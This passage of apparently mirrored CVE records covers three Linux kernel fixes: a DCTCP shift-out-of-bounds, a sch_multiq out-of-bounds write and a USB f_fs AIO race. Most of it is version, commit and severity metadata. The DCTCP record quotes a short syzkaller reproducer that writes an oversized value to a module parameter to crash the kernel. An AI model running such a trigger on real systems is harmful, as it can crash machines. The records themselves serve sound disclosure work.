          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: Fix shift-out-of-bounds in dctcp_update_alpha().\n\nIn dctcp_update_alpha(), we use a module parameter dctcp_shift_g\nas follows:\n\n  alpha -= min_not_zero(alpha, alpha \u003e\u003e dctcp_shift_g);\n  ...\n  delivered_ce \u003c\u003c= (10 - dctcp_shift_g);\n\nIt seems syzkaller started fuzzing module parameters and triggered\nshift-out-of-bounds [0] by setting 100 to dctcp_shift_g:\n\n  memcpy((void*)0x20000080,\n         \"/sys/module/tcp_dctcp/parameters/dctcp_shift_g\\000\", 47);\n  res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000080ul,\n                /*flags=*/2ul, /*mode=*/0ul);\n  memcpy((void*)0x20000000, \"100\\000\", 4);\n  syscall(__NR_write, /*fd=*/r[0], /*val=*/0x20000000ul, /*len=*/4ul);\n\nLet\u0027s limit the max value of dctcp_shift_g by param_set_uint_minmax().\n\nWith this patch:\n\n  # echo 10 \u003e /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n  # cat /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n  10\n  # echo 11 \u003e /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n  -bash: echo: write error: Invalid argument\n\n[0]:\nUBSAN: shift-out-of-bounds in net/ipv4/tcp_dctcp.c:143:12\nshift exponent 100 is too large for 32-bit type \u0027u32\u0027 (aka \u0027unsigned int\u0027)\nCPU: 0 PID: 8083 Comm: syz-executor345 Not tainted 6.9.0-05151-g1b294a1f3561 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.13.0-1ubuntu1.1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x201/0x300 lib/dump_stack.c:114\n ubsan_epilogue lib/ubsan.c:231 [inline]\n __ubsan_handle_shift_out_of_bounds+0x346/0x3a0 lib/ubsan.c:468\n dctcp_update_alpha+0x540/0x570 net/ipv4/tcp_dctcp.c:143\n tcp_in_ack_event net/ipv4/tcp_input.c:3802 [inline]\n tcp_ack+0x17b1/0x3bc0 net/ipv4/tcp_input.c:3948\n tcp_rcv_state_process+0x57a/0x2290 net/ipv4/tcp_input.c:6711\n tcp_v4_do_rcv+0x764/0xc40 net/ipv4/tcp_ipv4.c:1937\n sk_backlog_rcv include/net/sock.h:1106 [inline]\n __release_sock+0x20f/0x350 net/core/sock.c:2983\n release_sock+0x61/0x1f0 net/core/sock.c:3549\n mptcp_subflow_shutdown+0x3d0/0x620 net/mptcp/protocol.c:2907\n mptcp_check_send_data_fin+0x225/0x410 net/mptcp/protocol.c:2976\n __mptcp_close+0x238/0xad0 net/mptcp/protocol.c:3072\n mptcp_close+0x2a/0x1a0 net/mptcp/protocol.c:3127\n inet_release+0x190/0x1f0 net/ipv4/af_inet.c:437\n __sock_release net/socket.c:659 [inline]\n sock_close+0xc0/0x240 net/socket.c:1421\n __fput+0x41b/0x890 fs/file_table.c:422\n task_work_run+0x23b/0x300 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0x9c8/0x2540 kernel/exit.c:878\n do_group_exit+0x201/0x2b0 kernel/exit.c:1027\n __do_sys_exit_group kernel/exit.c:1038 [inline]\n __se_sys_exit_group kernel/exit.c:1036 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1036\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xe4/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f6c2b5005b6\nCode: Unable to access opcode bytes at 0x7f6c2b50058c.\nRSP: 002b:00007ffe883eb948 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\nRAX: ffffffffffffffda RBX: 00007f6c2b5862f0 RCX: 00007f6c2b5005b6\nRDX: 0000000000000001 RSI: 000000000000003c RDI: 0000000000000001\nRBP: 0000000000000001 R08: 00000000000000e7 R09: ffffffffffffffc0\nR10: 0000000000000006 R11: 0000000000000246 R12: 00007f6c2b5862f0\nR13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \u003c/TASK\u003e"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:22.548Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6"
        },
        {
          "url": "https://git.kernel.org/stable/c/6aacaa80d962f4916ccf90e2080306cec6c90fcf"
        },
        {
          "url": "https://git.kernel.org/stable/c/e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31"
        },
        {
          "url": "https://git.kernel.org/stable/c/8602150286a2a860a1dc55cbd04f99316f19b40a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e65d13ec00a738fa7661925fd5929ab3c765d4be"
        },
        {
          "url": "https://git.kernel.org/stable/c/02261d3f9dc7d1d7be7d778f839e3404ab99034c"
        },
        {
          "url": "https://git.kernel.org/stable/c/237340dee373b97833a491d2e99fcf1d4a9adafd"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ebc46ca8675de6378e3f8f40768e180bb8afa66"
        }
      ],
      "title": "tcp: Fix shift-out-of-bounds in dctcp_update_alpha().",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-37356",
    "datePublished": "2024-06-21T10:18:11.642Z",
    "dateReserved": "2024-06-21T10:13:16.306Z",
    "dateUpdated": "2025-11-04T17:21:20.246Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36978 (GCVE-0-2024-36978)

Vulnerability from cvelistv5 – Published: 2024-06-19 06:20 – Updated: 2025-11-03 21:55

Title

net: sched: sch_multiq: fix possible OOB write in multiq_tune()

Summary

In the Linux kernel, the following vulnerability has been resolved: net: sched: sch_multiq: fix possible OOB write in multiq_tune() q->bands will be assigned to qopt->bands to execute subsequent code logic after kmalloc. So the old q->bands should not be used in kmalloc. Otherwise, an out-of-bounds write will occur.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d5d9d241786f49ae7…
	https://git.kernel.org/stable/c/52b1aa07cda6a199c…
	https://git.kernel.org/stable/c/598572c64287aee0b…
	https://git.kernel.org/stable/c/0f208fad86631e005…
	https://git.kernel.org/stable/c/54c2c171c11a798fe…
	https://git.kernel.org/stable/c/d6fb5110e8722bc00…
	https://git.kernel.org/stable/c/affc18fdc694190ca…

Impacted products

Vendor

Product

Version

Linux

Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < d5d9d241786f49ae7cbc08e7fc95a115e9d80f3d (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < 52b1aa07cda6a199cd6754d3798c7759023bc70f (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < 598572c64287aee0b75bbba4e2881496878860f3 (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < 0f208fad86631e005754606c3ec80c0d44a11882 (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < 54c2c171c11a798fe887b3ff72922aa9d1411c1e (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < d6fb5110e8722bc00748f22caeb650fe4672f129 (git)
Affected: c2999f7fb05b87da4060e38150c70fa46794d82b , < affc18fdc694190ca7575b9a86632a73b9fe043d (git)

Linux

Affected: 5.4
Unaffected: 0 , < 5.4 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36978",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-21T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-22T04:55:12.222Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:55:30.685Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d5d9d241786f49ae7cbc08e7fc95a115e9d80f3d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52b1aa07cda6a199cd6754d3798c7759023bc70f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/598572c64287aee0b75bbba4e2881496878860f3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0f208fad86631e005754606c3ec80c0d44a11882"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54c2c171c11a798fe887b3ff72922aa9d1411c1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d6fb5110e8722bc00748f22caeb650fe4672f129"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/affc18fdc694190ca7575b9a86632a73b9fe043d"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_multiq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d5d9d241786f49ae7cbc08e7fc95a115e9d80f3d",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "52b1aa07cda6a199cd6754d3798c7759023bc70f",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "598572c64287aee0b75bbba4e2881496878860f3",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "0f208fad86631e005754606c3ec80c0d44a11882",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "54c2c171c11a798fe887b3ff72922aa9d1411c1e",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "d6fb5110e8722bc00748f22caeb650fe4672f129",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            },
            {
              "lessThan": "affc18fdc694190ca7575b9a86632a73b9fe043d",
              "status": "affected",
              "version": "c2999f7fb05b87da4060e38150c70fa46794d82b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_multiq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.4"
            },
            {
              "lessThan": "5.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.95",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: sch_multiq: fix possible OOB write in multiq_tune()\n\nq-\u003ebands will be assigned to qopt-\u003ebands to execute subsequent code logic\nafter kmalloc. So the old q-\u003ebands should not be used in kmalloc.\nOtherwise, an out-of-bounds write will occur."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:14.643Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d5d9d241786f49ae7cbc08e7fc95a115e9d80f3d"
        },
        {
          "url": "https://git.kernel.org/stable/c/52b1aa07cda6a199cd6754d3798c7759023bc70f"
        },
        {
          "url": "https://git.kernel.org/stable/c/598572c64287aee0b75bbba4e2881496878860f3"
        },
        {
          "url": "https://git.kernel.org/stable/c/0f208fad86631e005754606c3ec80c0d44a11882"
        },
        {
          "url": "https://git.kernel.org/stable/c/54c2c171c11a798fe887b3ff72922aa9d1411c1e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d6fb5110e8722bc00748f22caeb650fe4672f129"
        },
        {
          "url": "https://git.kernel.org/stable/c/affc18fdc694190ca7575b9a86632a73b9fe043d"
        }
      ],
      "title": "net: sched: sch_multiq: fix possible OOB write in multiq_tune()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36978",
    "datePublished": "2024-06-19T06:20:23.103Z",
    "dateReserved": "2024-05-30T15:25:07.082Z",
    "dateUpdated": "2025-11-03T21:55:30.685Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36894 (GCVE-0-2024-36894)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:28 – Updated: 2025-11-03 21:55

Title

usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete FFS based applications can utilize the aio_cancel() callback to dequeue pending USB requests submitted to the UDC. There is a scenario where the FFS application issues an AIO cancel call, while the UDC is handling a soft disconnect. For a DWC3 based implementation, the callstack looks like the following: DWC3 Gadget FFS Application dwc3_gadget_soft_disconnect() ... --> dwc3_stop_active_transfers() --> dwc3_gadget_giveback(-ESHUTDOWN) --> ffs_epfile_async_io_complete() ffs_aio_cancel() --> usb_ep_free_request() --> usb_ep_dequeue() There is currently no locking implemented between the AIO completion handler and AIO cancel, so the issue occurs if the completion routine is running in parallel to an AIO cancel call coming from the FFS application. As the completion call frees the USB request (io_data->req) the FFS application is also referencing it for the usb_ep_dequeue() call. This can lead to accessing a stale/hanging pointer. commit b566d38857fc ("usb: gadget: f_fs: use io_data->status consistently") relocated the usb_ep_free_request() into ffs_epfile_async_io_complete(). However, in order to properly implement locking to mitigate this issue, the spinlock can't be added to ffs_epfile_async_io_complete(), as usb_ep_dequeue() (if successfully dequeuing a USB request) will call the function driver's completion handler in the same context. Hence, leading into a deadlock. Fix this issue by moving the usb_ep_free_request() back to ffs_user_copy_worker(), and ensuring that it explicitly sets io_data->req to NULL after freeing it within the ffs->eps_lock. This resolves the race condition above, as the ffs_aio_cancel() routine will not continue attempting to dequeue a request that has already been freed, or the ffs_user_copy_work() not freeing the USB request until the AIO cancel is done referencing it. This fix depends on commit b566d38857fc ("usb: gadget: f_fs: use io_data->status consistently")

Severity ?

5.6 (Medium)


                        
                          CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H

CWE

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f71a53148ce34898f…
	https://git.kernel.org/stable/c/9e72ef59cbe61cd12…
	https://git.kernel.org/stable/c/e500b1c4e29ad0bd1…
	https://git.kernel.org/stable/c/3613e5023f09b3308…
	https://git.kernel.org/stable/c/a0fdccb1c9e027e31…
	https://git.kernel.org/stable/c/73c05ad46bb4fbbdb…
	https://git.kernel.org/stable/c/d7461830823242702…
	https://git.kernel.org/stable/c/24729b307eefcd7c4…

Impacted products

Vendor

Product

Version

Linux

Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < f71a53148ce34898fef099b75386a3a9f4449311 (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < 9e72ef59cbe61cd1243857a6418ca92104275867 (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < e500b1c4e29ad0bd1c1332a1eaea2913627a92dd (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < 3613e5023f09b3308545e9d1acda86017ebd418a (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < a0fdccb1c9e027e3195f947f61aa87d6d0d2ea14 (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < 73c05ad46bb4fbbdb346004651576d1c8dbcffbb (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < d7461830823242702f5d84084bcccb25159003f4 (git)
Affected: 2e4c7553cd6f9c68bb741582dcb614edcbeca70f , < 24729b307eefcd7c476065cd7351c1a018082c19 (git)

Linux

Affected: 3.15
Unaffected: 0 , < 3.15 (semver)
Unaffected: 4.19.317 , ≤ 4.19.* (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.95 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "73c05ad46bb4",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "d74618308232",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "24729b307eef",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "lessThan": "f71a53148ce3",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "lessThan": "9e72ef59cbe6",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "lessThan": "e500b1c4e29a",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "lessThan": "3613e5023f09",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "lessThan": "a0fdccb1c9e0",
                "status": "affected",
                "version": "2e4c7553cd6f",
                "versionType": "custom"
              },
              {
                "status": "affected",
                "version": "3.15"
              },
              {
                "lessThan": "3.15",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.317",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.5",
                "status": "unaffected",
                "version": "5.4.279",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.11",
                "status": "unaffected",
                "version": "5.10.221",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "5.16",
                "status": "unaffected",
                "version": "5.15.162",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.2",
                "status": "unaffected",
                "version": "6.1.95",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.7",
                "status": "unaffected",
                "version": "6.6.31",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "6.9",
                "status": "unaffected",
                "version": "6.8.10",
                "versionType": "custom"
              },
              {
                "lessThanOrEqual": "*",
                "status": "unaffected",
                "version": "6.9",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "HIGH",
              "attackVector": "PHYSICAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.6,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36894",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-03T15:53:00.949597Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-362",
                "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-21T16:17:27.715Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:55:22.274Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f71a53148ce34898fef099b75386a3a9f4449311"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9e72ef59cbe61cd1243857a6418ca92104275867"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e500b1c4e29ad0bd1c1332a1eaea2913627a92dd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3613e5023f09b3308545e9d1acda86017ebd418a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a0fdccb1c9e027e3195f947f61aa87d6d0d2ea14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73c05ad46bb4fbbdb346004651576d1c8dbcffbb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d7461830823242702f5d84084bcccb25159003f4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/24729b307eefcd7c476065cd7351c1a018082c19"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_fs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f71a53148ce34898fef099b75386a3a9f4449311",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "9e72ef59cbe61cd1243857a6418ca92104275867",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "e500b1c4e29ad0bd1c1332a1eaea2913627a92dd",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "3613e5023f09b3308545e9d1acda86017ebd418a",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "a0fdccb1c9e027e3195f947f61aa87d6d0d2ea14",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "73c05ad46bb4fbbdb346004651576d1c8dbcffbb",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "d7461830823242702f5d84084bcccb25159003f4",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            },
            {
              "lessThan": "24729b307eefcd7c476065cd7351c1a018082c19",
              "status": "affected",
              "version": "2e4c7553cd6f9c68bb741582dcb614edcbeca70f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_fs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.15"
            },
            {
              "lessThan": "3.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.317",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.95",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.317",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "3.15",
                  "vulnerable": true
                },
                {
